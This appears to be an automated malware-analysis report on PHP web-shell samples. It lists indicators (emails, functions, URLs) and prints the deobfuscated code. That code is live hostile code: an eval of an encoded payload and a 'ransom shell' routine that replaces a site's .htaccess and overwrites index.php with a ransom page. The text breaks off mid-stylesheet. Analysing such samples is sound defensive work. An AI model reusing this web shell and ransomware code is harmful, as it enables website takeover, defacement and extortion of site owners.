PHP Malware Analysis
by.php, ran.php
md5: d864686ea407aa04c71fe1968b9cc9a1
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Emails
- fikriwalker4676@gmail.com (Deobfuscated, Original)
- HackerBaloch07@gmail.com (Deobfuscated, HTML, Traces)
- TuyulJahat86@gmail.com (Deobfuscated, Traces)
Encoding
- base64_decode (Deobfuscated, Original, Traces)
- base64_encode (Deobfuscated, Traces)
Environment
- error_reporting (Deobfuscated, Traces)
- getcwd (Deobfuscated, Traces)
- set_time_limit (Deobfuscated, Traces)
Execution
- eval (Deobfuscated, Original, Traces)
Files
- copy (Deobfuscated, Traces)
- file_get_contents (Deobfuscated, Traces)
- file_put_contents (Deobfuscated, Traces)
- move_uploaded_file (Deobfuscated, Traces)
Input
- _FILES (Deobfuscated, Traces)
- _GET (Deobfuscated, Traces)
- _POST (Deobfuscated, Traces)
URLs
- http://code.jquery.com/jquery-latest.min.js (Deobfuscated)
- http://fonts.googleapis.com/css?family=Black+Ops+One|Montserrat|Cabin+Sketch|Orbitron|Architects+Daughter|Permanent+Marker|Luckiest+Guy|Cherry+Cream+Soda (Deobfuscated)
- http://s29.postimg.org/7ru2q76jb/kcw_logo_deface.png (Deobfuscated)
- https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.5.2/animate.min.css (Deobfuscated)
- https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css (Deobfuscated)
- https://dl.dropboxusercontent.com/s/mnw91qaob50ozvl/we%20are%20anonymous.mp3?dl=0 (Deobfuscated)
- https://fonts.googleapis.com/css?family=Courgette (Deobfuscated, HTML, Traces)
- https://images4.alphacoders.com/634/thumb-1920-63444.jpg (Deobfuscated)
- https://k.top4top.net/m_12407hbmd0.mp3 (Deobfuscated, HTML, Traces)
- https://maxcdn.bootstrapcdn.com/font-awesome/4.6.3/css/font-awesome.min.css (Deobfuscated, HTML, Traces)
Deobfuscated PHP code
<?php
/*
5H311_1NJ3C706 Obfuscator
fikriwalker4676@gmail.com ;)
*/
$Cyber = "ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1bmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2RlY29kZSUyOHN0cnJldiUyOCUyNENyaW1lJTI5JTI5JTI5JTI5JTI5JTI5JTI5JTI5JTNC";
$Crime = "==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";
eval /* PHPDeobfuscator eval output */ {
?><!DOCTYPE html>
<html>
<head>
<title>RANSOM SHELL MINI</title>
<style type="text/css">
body {
background: #1A1C1F;
color: #e2e2e2;
}
.inpute{
border-style: dotted;
border-color: #379600;
background-color: transparent;
color: white;
text-align: center;
}
.selecte{
border-style: dotted;
border-color: green;
background-color: transparent;
color: green;
}
.submite{
border-style: dotted;
border-color: #4CAF50;
background-color: transparent;
color: white;
}
.result{
text-align: left;
}
</style>
<link rel="stylesheet" type="text/css" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.6.3/css/font-awesome.min.css">
</head>
<body>
<div class="result">
<?php
error_reporting(0);
set_time_limit(0);
ini_set('memory_limit', '-1');
class deRanSomeware
{
public function shcpackInstall()
{
if (!file_exists(".htaFuck")) {
rename(".htaccess", ".htaFuck");
if (fwrite(fopen('.htaccess', 'w'), "#5H311_1NJ3C706\r\nDirectoryIndex index.php\r\nErrorDocument 404 /index.php")) {
echo "<i class=\"fa fa-thumbs-o-up\" aria-hidden=\"true\"></i> .htaccess (Default Page)<br>";
}
if (file_put_contents("index.php", "\n<!DOCTYPE html>\n<html>\n <head>\n\t <title>All Your Website Database Files Are Encrypted</title>\n <meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\">\n <meta content=\"5H311_1NJ3C706\" name=\"description\"/>\n <meta content=\"5H311_1NJ3C706\" name=\"keywords\"/>\n <meta property=\"og:image\" content=\"http://s29.postimg.org/7ru2q76jb/kcw_logo_deface.png\" />\n\n <link href=\"http://fonts.googleapis.com/css?family=Black+Ops+One|Montserrat|Cabin+Sketch|Orbitron|Architects+Daughter|Permanent+Marker|Luckiest+Guy|Cherry+Cream+Soda\" rel=\"stylesheet\" />\n <link href=\"https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.5.2/animate.min.css\" rel=\"stylesheet\" />\n <link href=\"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css\" rel=\"stylesheet\" />\n <script type=\"text/javascript\" src=\"http://code.jquery.com/jquery-latest.min.js\"></script>\n \n\n <!-- CSS START HERE -->\n <style>\n\t\t html, body {min-height: 100%;}\n body {\n\t\t width: 100%;\n\t\t height: 100%;\n margin: 0;\n padding: 0;\n background-image: url('https://images4.alphacoders.com/634/thumb-1920-63444.jpg');\n background-color: #000;\n background-repeat: no-repeat;\n background-position: center;\n background-size: 150%;\n background-color: #000;\n color: #FFFFFF;\n font-family:\"Orbitron\";\n font-size: 14pt;\n text-align: center;\n text-decoration: none;\n } \n a { text-decoration: none; }\n .vis {\n\t\t text-shadow: 2px 2px 2px #000;\n\t\t }\n .glow {\n text-shadow: 0 0 10px #F59700;\n font-family:\"Black Ops One\";\n }\n .blueglow {\n text-shadow: 0 0 10px #0F6FBD;\n font-family:\"Black Ops One\"\n }\n .whiteglow,.gw {\n text-shadow: 0 0 5px #FFFFFF;\n font-family:\"Black Ops One\";\n }\n\n #hello {\n font-size: 20px;\n -moz-transition: color 1s;\n -webkit-transition: color 1s;\n -ms-transition: color 1s;\n -o-transition: color 1s;\n transition: color 1.2s;\n font-family:\"Black Ops One\"\n }\n #hello:hover {\n color: yellow;\n -webkit-stroke-width: 10px;\n -webkit-stroke-color: #FFFFFF;\n -webkit-fill-color: #FFFFFF;\n text-shadow: 1px 0px 20px red;\n font-family:\"Black Ops One\"\n }\n .cn1,.gg {\n text-shadow: 0 0 13px #57f927;\n font-family:\"Black Ops One\";\n }\n .cna,.go {\n 